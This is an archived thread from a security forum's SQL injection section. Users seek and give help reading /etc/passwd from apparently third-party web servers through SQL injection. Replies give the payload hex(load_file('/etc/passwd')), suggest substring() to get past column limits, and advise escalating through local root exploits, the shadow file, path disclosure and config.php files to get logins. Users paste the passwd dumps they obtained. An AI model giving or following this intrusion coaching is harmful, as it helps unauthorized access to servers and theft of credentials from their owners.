|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 52
Members: 0
Total: 52
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
/etc/passwd |
|
Posted: Sat Dec 13, 2008 11:51 pm |
|
|
vcore |
Regular user |
|
|
Joined: Jun 28, 2005 |
Posts: 13 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Sun Dec 14, 2008 12:26 am |
|
|
_mranderson_ |
Valuable expert |
|
|
Joined: Oct 30, 2008 |
Posts: 51 |
|
|
|
|
|
|
|
Probably the script is outputting just the first line; try hexing the string:
hex(load_file('/etc/passwd'))
anyways, reading the passwd file nowadays will just give you an idea of what users can login into the system. Almost every passwd file is shadowed, which means that if you do not have root access to the box, you ll have to use a local root exploit to read the shadow file where the hashes are stored.
The X you are referring to is just a dummy replacement for the pasword's hash.
I suggest you to try reading some config file inside the server to find some login you can use to get farther access. If you do not have a clue, google "path disclosure" and the try to access config.php files in the webserver's root folder. If you can't figure it out, try "/var/www/" or "/home/www/" or "/var/vhosts/site.com/www/", hopefully you will find something. |
|
|
|
|
|
|
|
|
Posted: Sun Dec 14, 2008 2:00 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
It's easy to understand the essence of the problem - column, you are using for data fetch, is probably declared as varchar(20), so you can get only 20 bytes of data at once. You can try to use other columns or make use of substring():
http://dev.mysql.com/doc/refman/5.1/en/string-functions.html#function_substring
As for "X"-s instead of password hashes - A long time ago in a galaxy far, far away ... there was decision about moving password hashes to the "/etc/shadow" in linux distros and "/etc/master.passwd" in *bsd systems. And only root can by default read those files
http://en.wikipedia.org/wiki/Shadow_password |
|
|
|
|
|
|
|
|
Posted: Sun Dec 14, 2008 5:09 pm |
|
|
vcore |
Regular user |
|
|
Joined: Jun 28, 2005 |
Posts: 13 |
|
|
|
|
|
|
|
I went for the easiest solution wich was doing it in another field and i get this:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shu
Now it's time to research for some "path disclosure".
Thanks for you answers! |
|
|
|
|
|
|
|
|
Posted: Sun Dec 14, 2008 8:01 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
vcore wrote: | I went for the easiest solution wich was doing it in another field and i get this:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shu
Now it's time to research for some "path disclosure".
Thanks for you answers! |
This is not full file dude. |
|
|
|
|
|
|
|
|
Posted: Sat May 02, 2009 9:55 pm |
|
|
tesh80 |
Regular user |
|
|
Joined: Apr 23, 2009 |
Posts: 10 |
|
|
|
|
|
|
|
help me for that
how we can me find all url and user :
i find that
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:100:102::/var/spool/exim4:/bin/false
statd:x:101:65534::/var/lib/nfs:/bin/false
identd:x:102:65534::/var/run/identd:/bin/false
law:x:1000:1000:law,,,:/home/law:/bin/bash
ntp:x:103:104::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:105:65534::/var/lib/snmp:/bin/false
mysql:x:1001:1001::/home/mysql:/bin/sh
but i want all etc/passwd
he can help me |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|